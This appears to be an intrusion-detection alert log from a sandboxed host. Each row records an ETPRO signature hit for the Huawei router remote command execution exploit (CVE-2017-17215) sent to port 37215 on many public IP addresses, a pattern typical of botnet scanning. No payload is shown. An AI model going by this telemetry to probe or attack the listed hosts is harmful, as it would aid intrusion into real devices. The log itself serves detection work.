                                                        06/13/24-21:32:19.730306TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5380237215192.168.2.14156.39.177.163
                                                        06/13/24-21:32:58.820260TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5840437215192.168.2.14197.117.83.179
                                                        06/13/24-21:32:38.302501TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4793037215192.168.2.14156.187.137.2
                                                        06/13/24-21:32:15.636249TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4798637215192.168.2.14197.54.47.148
                                                        06/13/24-21:32:54.711565TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3680637215192.168.2.14156.135.121.138
                                                        06/13/24-21:32:38.303747TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5413037215192.168.2.1441.250.119.214
                                                        06/13/24-21:33:09.129556TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4855437215192.168.2.14156.21.178.81
                                                        06/13/24-21:32:25.974717TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4267437215192.168.2.14197.8.83.23
                                                        06/13/24-21:32:36.243913TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4329837215192.168.2.14197.214.138.118
                                                        06/13/24-21:31:57.091995TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5699437215192.168.2.14197.197.243.183
                                                        06/13/24-21:32:44.452357TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4101637215192.168.2.14197.191.183.137
                                                        06/13/24-21:32:05.346648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3397437215192.168.2.14197.167.133.155
                                                        06/13/24-21:32:52.660167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5674837215192.168.2.1441.95.27.108
                                                        06/13/24-21:31:57.094218TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5351037215192.168.2.1441.40.22.39
                                                        06/13/24-21:32:36.242294TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4229037215192.168.2.14197.210.249.118
                                                        06/13/24-21:33:00.867082TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6079237215192.168.2.1441.196.131.20
                                                        06/13/24-21:32:58.838316TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4810637215192.168.2.14197.26.83.112
                                                        06/13/24-21:32:54.707144TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4869437215192.168.2.14156.223.37.228
                                                        06/13/24-21:32:28.026517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3358837215192.168.2.14197.66.160.152
                                                        06/13/24-21:32:15.611033TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3909437215192.168.2.14156.236.77.235
                                                        06/13/24-21:32:54.725695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5085437215192.168.2.1441.168.1.111
                                                        06/13/24-21:32:50.611690TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5897037215192.168.2.1441.188.248.35
                                                        06/13/24-21:32:42.406216TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5869837215192.168.2.14156.59.79.24
                                                        06/13/24-21:32:48.551260TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5054637215192.168.2.1441.107.192.9
                                                        06/13/24-21:32:19.752103TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3364637215192.168.2.14197.28.35.150
                                                        06/13/24-21:32:23.836633TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5761237215192.168.2.1441.65.158.112
                                                        06/13/24-21:33:17.308343TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5900637215192.168.2.14156.59.140.233
                                                        06/13/24-21:32:25.990302TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4321237215192.168.2.14197.55.231.138
                                                        06/13/24-21:32:23.940981TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5450237215192.168.2.14197.45.68.16
                                                        06/13/24-21:32:48.569364TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5440837215192.168.2.14156.216.188.208
                                                        06/13/24-21:33:17.308837TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3689637215192.168.2.1441.3.140.208
                                                        06/13/24-21:32:13.547138TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4166237215192.168.2.14197.6.176.246
                                                        06/13/24-21:32:40.372766TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5022437215192.168.2.14197.106.156.8
                                                        06/13/24-21:33:11.173189TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4406037215192.168.2.14197.215.228.196
                                                        06/13/24-21:32:50.630770TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5790037215192.168.2.14197.89.24.4
                                                        06/13/24-21:32:30.079250TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3801237215192.168.2.14156.225.1.118
                                                        06/13/24-21:32:46.502509TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5882837215192.168.2.1441.225.9.175
                                                        06/13/24-21:32:15.610905TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4991037215192.168.2.1441.184.166.180
                                                        06/13/24-21:32:09.439850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4493237215192.168.2.14156.205.183.215
                                                        06/13/24-21:32:25.975936TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3389637215192.168.2.14197.247.248.159
                                                        06/13/24-21:32:32.168092TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3519237215192.168.2.14156.3.6.13
                                                        06/13/24-21:32:50.613937TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4791437215192.168.2.1441.167.17.210
                                                        06/13/24-21:32:30.079428TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3564837215192.168.2.14197.24.45.246
                                                        06/13/24-21:32:50.631701TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4573837215192.168.2.14156.203.21.211
                                                        06/13/24-21:32:21.805485TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3503837215192.168.2.14156.43.49.157
                                                        06/13/24-21:32:30.099077TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5811437215192.168.2.14197.247.169.87
                                                        06/13/24-21:33:07.056786TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5593837215192.168.2.1441.66.200.152
                                                        06/13/24-21:32:07.415678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4411237215192.168.2.1441.241.149.150
                                                        06/13/24-21:32:28.048725TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3411437215192.168.2.14197.174.46.186
                                                        06/13/24-21:33:00.886976TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3674837215192.168.2.14156.160.70.88
                                                        06/13/24-21:32:42.422150TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4150837215192.168.2.1441.249.27.158
                                                        06/13/24-21:32:09.437363TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4440037215192.168.2.14156.93.133.93
                                                        06/13/24-21:32:56.756777TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4365837215192.168.2.14197.58.213.166
                                                        06/13/24-21:33:13.231781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4589237215192.168.2.1441.144.170.21
                                                        06/13/24-21:31:59.194736TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5291237215192.168.2.14156.210.147.248
                                                        06/13/24-21:32:19.752902TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5044437215192.168.2.14197.13.153.18
                                                        06/13/24-21:33:09.085249TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5629637215192.168.2.1441.178.179.109
                                                        06/13/24-21:31:57.130933TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5564837215192.168.2.14197.169.39.140
                                                        06/13/24-21:32:48.551288TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3282437215192.168.2.1441.133.155.104
                                                        06/13/24-21:32:54.711660TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3414037215192.168.2.1441.32.113.16
                                                        06/13/24-21:33:17.310241TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5126037215192.168.2.14197.32.70.135
                                                        06/13/24-21:33:11.173304TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3751637215192.168.2.14197.117.240.109
                                                        06/13/24-21:32:19.730181TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3347837215192.168.2.14197.13.232.148
                                                        06/13/24-21:32:58.822457TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6007437215192.168.2.14156.85.138.213
                                                        06/13/24-21:32:01.240818TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5171037215192.168.2.14197.22.13.185
                                                        06/13/24-21:32:01.220172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4247637215192.168.2.14197.11.254.119
                                                        06/13/24-21:32:19.729210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5547637215192.168.2.14156.22.108.81
                                                        06/13/24-21:32:23.945660TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5536237215192.168.2.14197.184.133.8
                                                        06/13/24-21:32:17.670993TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3844037215192.168.2.14197.223.83.135
                                                        06/13/24-21:33:15.255665TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4966637215192.168.2.14156.142.81.162
                                                        06/13/24-21:32:36.246346TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5776837215192.168.2.14197.10.92.57
                                                        06/13/24-21:32:19.753422TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4162837215192.168.2.14197.113.94.117
                                                        06/13/24-21:33:13.214014TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5759837215192.168.2.1441.162.162.95
                                                        06/13/24-21:32:11.487240TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4775837215192.168.2.1441.175.217.173
                                                        06/13/24-21:31:57.132824TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4201237215192.168.2.1441.199.109.61
                                                        06/13/24-21:33:07.040778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5372637215192.168.2.1441.157.55.17
                                                        06/13/24-21:33:17.307719TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5490837215192.168.2.14197.187.252.173
                                                        06/13/24-21:33:04.990741TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5967437215192.168.2.1441.46.155.76
                                                        06/13/24-21:33:11.158614TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5366037215192.168.2.14197.138.166.248
                                                        06/13/24-21:32:25.991237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5003837215192.168.2.1441.174.252.98
                                                        06/13/24-21:33:02.954140TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5986237215192.168.2.14156.113.243.85
                                                        06/13/24-21:33:09.129861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5052837215192.168.2.14197.217.211.223
                                                        06/13/24-21:32:30.091879TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5936237215192.168.2.14156.126.176.112
                                                        06/13/24-21:33:00.885634TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3891037215192.168.2.1441.148.124.119
                                                        06/13/24-21:32:25.973570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3348237215192.168.2.14156.84.46.49
                                                        06/13/24-21:32:44.456564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5867037215192.168.2.1441.22.57.93
                                                        06/13/24-21:32:46.503671TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4649437215192.168.2.1441.89.204.171
                                                        06/13/24-21:32:32.154115TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4131837215192.168.2.14156.20.112.151
                                                        06/13/24-21:33:09.111199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3459837215192.168.2.14156.162.21.227
                                                        06/13/24-21:32:56.755946TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3406637215192.168.2.1441.45.201.214
                                                        06/13/24-21:32:01.239824TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3524437215192.168.2.14156.112.6.10
                                                        06/13/24-21:32:28.025419TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5513037215192.168.2.14156.31.112.156
                                                        06/13/24-21:31:57.091870TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3981437215192.168.2.14156.231.38.101
                                                        06/13/24-21:32:07.404201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4680037215192.168.2.14156.17.227.21
                                                        06/13/24-21:33:15.273813TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3974437215192.168.2.14156.41.222.88
                                                        06/13/24-21:32:09.455920TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3864237215192.168.2.14156.90.189.139
                                                        06/13/24-21:32:09.440696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4802037215192.168.2.14156.93.54.18
                                                        06/13/24-21:32:54.710986TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6022637215192.168.2.1441.42.76.200
                                                        06/13/24-21:32:01.221229TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5894037215192.168.2.1441.190.81.189
                                                        06/13/24-21:32:01.222216TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4307037215192.168.2.14156.196.219.34
                                                        06/13/24-21:31:59.177163TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5866237215192.168.2.14156.222.68.8
                                                        06/13/24-21:33:07.058422TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4603637215192.168.2.14197.183.16.191
                                                        06/13/24-21:32:17.675038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5792437215192.168.2.14156.57.29.14
                                                        06/13/24-21:31:59.198113TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5922637215192.168.2.1441.89.98.0
                                                        06/13/24-21:32:21.804805TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4861837215192.168.2.14197.219.207.144
                                                        06/13/24-21:32:52.672072TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4260437215192.168.2.14197.110.207.175
                                                        06/13/24-21:32:40.378082TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5797237215192.168.2.14197.242.155.195
                                                        06/13/24-21:32:30.094771TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4077837215192.168.2.14156.214.168.36
                                                        06/13/24-21:33:04.993578TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4100837215192.168.2.1441.7.91.132
                                                        06/13/24-21:32:05.378398TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4399237215192.168.2.14156.92.20.172
                                                        06/13/24-21:32:50.613211TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3753637215192.168.2.14197.246.221.214
                                                        06/13/24-21:32:40.354325TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3913437215192.168.2.14197.171.201.121
                                                        06/13/24-21:32:19.748612TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3875837215192.168.2.14156.179.44.143
                                                        06/13/24-21:32:28.028275TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3582237215192.168.2.1441.76.174.247
                                                        06/13/24-21:33:13.231221TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3492037215192.168.2.14197.161.252.53
                                                        06/13/24-21:32:03.306689TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5529837215192.168.2.14156.28.117.211
                                                        06/13/24-21:31:57.132628TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4310037215192.168.2.14156.132.238.227
                                                        06/13/24-21:32:21.787417TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4531637215192.168.2.14156.197.118.146
                                                        06/13/24-21:32:28.028324TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5439037215192.168.2.14197.88.83.228
                                                        06/13/24-21:32:58.821614TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4263037215192.168.2.14156.248.131.41
                                                        06/13/24-21:32:25.992283TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4810837215192.168.2.14197.21.219.241
                                                        06/13/24-21:32:13.546924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5108637215192.168.2.14156.153.247.11
                                                        06/13/24-21:32:28.027294TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5473437215192.168.2.14197.114.213.155
                                                        06/13/24-21:32:56.758326TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6055837215192.168.2.14197.225.195.158
                                                        06/13/24-21:31:57.133595TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5176837215192.168.2.14156.116.60.230
                                                        06/13/24-21:33:00.872409TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3768437215192.168.2.14156.6.147.192
                                                        06/13/24-21:32:15.630491TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3622837215192.168.2.14197.55.222.29
                                                        06/13/24-21:32:44.480799TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3735437215192.168.2.14197.79.243.242
                                                        06/13/24-21:32:46.501734TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4233437215192.168.2.14156.227.189.99
                                                        06/13/24-21:33:02.909065TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5725237215192.168.2.14156.159.205.21
                                                        06/13/24-21:33:15.271029TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4787237215192.168.2.1441.223.184.38
                                                        06/13/24-21:32:28.048462TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5602037215192.168.2.14156.29.13.141
                                                        06/13/24-21:32:19.726515TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4642437215192.168.2.14197.182.164.20
                                                        06/13/24-21:32:15.630121TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3719237215192.168.2.14197.108.170.112
                                                        06/13/24-21:32:34.200129TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4487237215192.168.2.14197.254.234.5
                                                        06/13/24-21:32:09.440350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4676237215192.168.2.14197.225.202.223
                                                        06/13/24-21:32:23.835432TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5998237215192.168.2.1441.55.175.168
                                                        06/13/24-21:33:02.908139TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5457637215192.168.2.14197.185.246.102
                                                        06/13/24-21:32:17.697657TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4904637215192.168.2.14197.195.158.212
                                                        06/13/24-21:31:59.177214TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5718837215192.168.2.1441.39.234.106
                                                        06/13/24-21:31:59.177814TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3408837215192.168.2.14156.165.95.110
                                                        06/13/24-21:33:13.211934TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3296637215192.168.2.14197.23.63.212
                                                        06/13/24-21:32:11.506353TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5440637215192.168.2.1441.221.3.207
                                                        06/13/24-21:32:28.028666TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5707437215192.168.2.14197.226.183.112
                                                        06/13/24-21:33:02.908975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5359637215192.168.2.14156.38.152.63
                                                        06/13/24-21:32:50.612691TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6039637215192.168.2.1441.9.16.230
                                                        06/13/24-21:32:21.786317TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3471437215192.168.2.14197.186.254.225
                                                        06/13/24-21:32:38.315886TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3481237215192.168.2.14156.209.42.234
                                                        06/13/24-21:33:07.039478TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5450837215192.168.2.14156.210.158.11
                                                        06/13/24-21:32:52.656459TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5614437215192.168.2.14197.247.152.60
                                                        06/13/24-21:33:00.872695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5567037215192.168.2.1441.8.55.202
                                                        06/13/24-21:33:11.177441TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5919237215192.168.2.14156.145.84.229
                                                        06/13/24-21:32:58.820901TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5649637215192.168.2.14156.131.33.98
                                                        06/13/24-21:32:54.725586TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4688037215192.168.2.14197.144.238.125
                                                        06/13/24-21:33:11.156853TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4768837215192.168.2.1441.172.59.21
                                                        06/13/24-21:32:58.820517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4805637215192.168.2.1441.236.164.219
                                                        06/13/24-21:32:03.304098TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5377837215192.168.2.1441.194.81.49
                                                        06/13/24-21:32:30.096347TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4407837215192.168.2.14156.41.177.249
                                                        06/13/24-21:32:48.550795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4387037215192.168.2.14156.9.132.104
                                                        06/13/24-21:32:11.488311TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3587637215192.168.2.1441.8.163.132
                                                        06/13/24-21:32:56.754833TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5699637215192.168.2.1441.216.47.31
                                                        06/13/24-21:32:32.167194TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4834837215192.168.2.14156.181.63.13
                                                        06/13/24-21:32:58.842018TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3629037215192.168.2.1441.29.242.139
                                                        06/13/24-21:32:30.076312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4256437215192.168.2.14197.160.126.181
                                                        06/13/24-21:33:02.913889TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5789037215192.168.2.14197.44.136.29
                                                        06/13/24-21:33:02.909490TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5837237215192.168.2.1441.196.162.235
                                                        06/13/24-21:31:59.195185TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5977037215192.168.2.14156.30.164.95
                                                        06/13/24-21:32:42.418616TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4888037215192.168.2.14197.194.254.155
                                                        06/13/24-21:33:04.990901TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4165237215192.168.2.1441.44.47.146
                                                        06/13/24-21:32:17.673899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3743637215192.168.2.14156.58.165.172
                                                        06/13/24-21:32:17.677685TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6069637215192.168.2.1441.118.56.181
                                                        06/13/24-21:33:13.210584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3712637215192.168.2.1441.105.155.124
                                                        06/13/24-21:32:30.124517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5558437215192.168.2.14156.224.53.182
                                                        06/13/24-21:32:58.823175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4739437215192.168.2.14197.250.60.25
                                                        06/13/24-21:33:02.936338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5943837215192.168.2.14156.53.218.36
                                                        06/13/24-21:32:01.220203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5058837215192.168.2.14197.221.212.245
                                                        06/13/24-21:33:09.108501TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4093437215192.168.2.14156.228.198.161
                                                        06/13/24-21:32:25.968963TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4910037215192.168.2.1441.199.179.115
                                                        06/13/24-21:33:09.085947TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3453637215192.168.2.14197.104.8.78
                                                        06/13/24-21:33:09.106167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3719237215192.168.2.14156.28.104.162
                                                        06/13/24-21:33:04.988940TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5292437215192.168.2.1441.120.4.88
                                                        06/13/24-21:33:15.274437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3937437215192.168.2.1441.154.135.124
                                                        06/13/24-21:33:17.305301TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5167237215192.168.2.1441.207.24.252
                                                        06/13/24-21:32:28.028492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5125637215192.168.2.1441.64.81.242
                                                        06/13/24-21:33:07.054887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3810037215192.168.2.14197.98.246.236
